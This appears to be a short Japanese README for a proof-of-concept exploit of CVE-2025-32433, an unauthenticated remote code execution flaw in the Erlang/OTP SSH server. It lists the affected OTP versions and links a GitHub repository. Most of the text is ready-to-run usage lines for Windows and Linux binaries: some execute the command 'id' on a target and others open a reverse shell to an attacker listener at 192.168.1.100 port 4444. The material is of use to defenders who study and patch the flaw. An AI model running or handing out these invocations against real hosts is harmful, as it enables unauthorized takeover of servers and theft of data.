
CVE-2025-32433 Erlang/OTP SSH RCE エクスプロイト SSHリモートコード実行脆弱性エクスプロイト
Erlang/OTP SSHサーバーに深刻な脆弱性が発見され、攻撃者が認証なしでリモートコード実行(RCE)を行う可能性があります。SSHプロトコルメッセージ処理の欠陥を悪用することにより、悪意のある攻撃者は影響を受けるシステムに不正にアクセスし、有効な認証情報なしで任意のコマンドを実行できます。これにより、対象ホストが侵害され、第三者が機密データに不正アクセスしたり操作したり、サービス拒否攻撃を引き起こす可能性があります。
OTP-27.3.2 およびそれ以前
OTP-26.2.5.10 およびそれ以前
OTP-25.3.2.19 およびそれ以前
cve-2025-32433.exe 127.0.0.1 -c 'id'
./cve-2025-32433.lnx 127.0.0.1 -c 'id'
cve-2025-32433.exe 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444
./cve-2025-32433.lnx 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444

https://github.com/omer-efe-curkus/CVE-2025-32433-Erlang-OTP-SSH-RCE-PoC